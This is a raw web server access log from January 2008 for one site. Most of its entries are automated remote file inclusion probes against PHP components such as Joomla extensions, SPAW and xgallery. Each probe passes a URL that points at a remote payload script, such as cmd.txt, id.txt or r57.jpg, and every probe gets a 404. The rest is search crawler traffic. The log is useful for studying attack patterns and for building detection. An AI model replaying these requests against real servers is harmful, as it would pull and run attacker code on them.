69.41.174.211 - - [10/Jan/2008:15:06:30 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:15:07:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:15:07:33 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:15:08:06 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 200 2958332 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.114.58 - - [10/Jan/2008:15:08:21 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [10/Jan/2008:15:08:21 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.48 - - [10/Jan/2008:15:13:14 -0800] "GET /logs/access_071006.log HTTP/1.0" 200 58327 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.73.67 - - [10/Jan/2008:15:18:00 -0800] "GET /logs/access_071225.log/index1.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [10/Jan/2008:15:18:00 -0800] "GET /index1.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [10/Jan/2008:15:18:01 -0800] "GET /logs/index1.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.224 - - [10/Jan/2008:15:19:22 -0800] "GET /logs/access_071209.log HTTP/1.0" 200 44097 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.70.183 - - [10/Jan/2008:15:20:40 -0800] "GET /logs/access_071225.log/index1.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.183 - - [10/Jan/2008:15:20:40 -0800] "GET /index1.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.183 - - [10/Jan/2008:15:20:40 -0800] "GET /logs/index1.php?pag=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.245.170.43 - - [10/Jan/2008:15:20:54 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.12.138 - - [10/Jan/2008:15:23:43 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.13 - - [10/Jan/2008:15:23:43 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.114.58 - - [10/Jan/2008:15:26:04 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.12.138 - - [10/Jan/2008:15:27:35 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.138 - - [10/Jan/2008:15:27:35 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.20.28 - - [10/Jan/2008:15:29:36 -0800] "GET //skin/zero_vote/error.php?dir=http://arcantus.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:30:02 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:30:02 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:30:02 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:30:22 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:30:47 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:15:32:17 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:15:32:17 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
81.25.68.146 - - [10/Jan/2008:15:32:33 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://djitkai/bo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.25.68.146 - - [10/Jan/2008:15:32:33 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://djitkai/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.180.216.12 - - [10/Jan/2008:15:33:57 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [10/Jan/2008:15:34:00 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [10/Jan/2008:15:34:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:34:32 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:34:32 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:34:32 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.140 - - [10/Jan/2008:15:34:47 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:15:35:12 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:15:35:13 -0800] "GET //skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:15:35:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:15:35:38 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:15:35:45 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:15:37:55 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:38:51 -0800] "GET //skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:40:25 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:40:25 -0800] "GET //skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:40:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:41:16 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.106 - - [10/Jan/2008:15:42:55 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:43:13 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:43:13 -0800] "GET //skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:43:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.33.76.130 - - [10/Jan/2008:15:44:47 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.33.76.130 - - [10/Jan/2008:15:44:47 -0800] "GET //skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.33.76.130 - - [10/Jan/2008:15:44:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.35.197.125 - - [10/Jan/2008:15:45:42 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.33.76.130 - - [10/Jan/2008:15:47:33 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:15:55:00 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:15:55:00 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:15:55:01 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [10/Jan/2008:15:56:23 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://faz.edu.br/email/database/login? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
89.218.85.18 - - [10/Jan/2008:15:56:23 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://faz.edu.br/email/database/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.30.216.109 - - [10/Jan/2008:15:59:42 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:16:01:39 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:16:01:40 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:16:02:30 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:16:02:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:16:02:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:16:04:52 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:16:04:52 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:16:05:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.144.116 - - [10/Jan/2008:16:06:15 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://pattaya-revealed.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
80.190.144.116 - - [10/Jan/2008:16:06:16 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://pattaya-revealed.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
216.246.61.117 - - [10/Jan/2008:16:09:48 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.61.117 - - [10/Jan/2008:16:09:48 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.61.117 - - [10/Jan/2008:16:09:48 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.169 - - [10/Jan/2008:16:10:00 -0800] "GET /funny/?M=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.147.239.150 - - [10/Jan/2008:16:10:34 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [10/Jan/2008:16:10:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [10/Jan/2008:16:10:35 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:16:11:57 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:16:11:57 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:16:11:57 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:16:11:58 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.126 - - [10/Jan/2008:16:12:48 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://anto.fr/skin/mambots/system/.errors.php/.../cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [10/Jan/2008:16:12:48 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://anto.fr/skin/mambots/system/.errors.php/.../cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [10/Jan/2008:16:12:48 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://anto.fr/skin/mambots/system/.errors.php/.../cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.156.38 - - [10/Jan/2008:16:12:49 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.156.38 - - [10/Jan/2008:16:12:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.156.38 - - [10/Jan/2008:16:12:50 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:16:12:58 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:16:13:48 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:16:13:48 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.234.205.32 - - [10/Jan/2008:16:19:19 -0800] "GET //index.php?admin=http://www.pinemore.com/wp-content/myfotos/933wgrant/tumbs/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
201.234.205.32 - - [10/Jan/2008:16:19:19 -0800] "GET /logs//index.php?admin=http://www.pinemore.com/wp-content/myfotos/933wgrant/tumbs/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:16:19:37 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:16:19:37 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.104.188.3 - - [10/Jan/2008:16:20:06 -0800] "GET //skin/zero_vote/error.php?dir=http://arcadenoe.sapo.pt/files/wkd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.180.175.37 - - [10/Jan/2008:16:20:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.proxycity.com/counter/.../response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.180.175.37 - - [10/Jan/2008:16:20:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.proxycity.com/counter/.../response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.151.232.133 - - [10/Jan/2008:16:21:00 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.104 - - [10/Jan/2008:16:24:01 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.68.44.59 - - [10/Jan/2008:16:24:18 -0800] "GET /logs/access_071216.log//spaw/spaw_control.class.php?spaw_root=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.68.44.59 - - [10/Jan/2008:16:24:24 -0800] "GET //spaw/spaw_control.class.php?spaw_root=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.68.44.59 - - [10/Jan/2008:16:24:28 -0800] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.99.64 - - [10/Jan/2008:16:25:33 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [10/Jan/2008:16:26:23 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [10/Jan/2008:16:26:23 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [10/Jan/2008:16:26:23 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.156.38 - - [10/Jan/2008:16:27:07 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.156.38 - - [10/Jan/2008:16:27:08 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.156.38 - - [10/Jan/2008:16:27:08 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
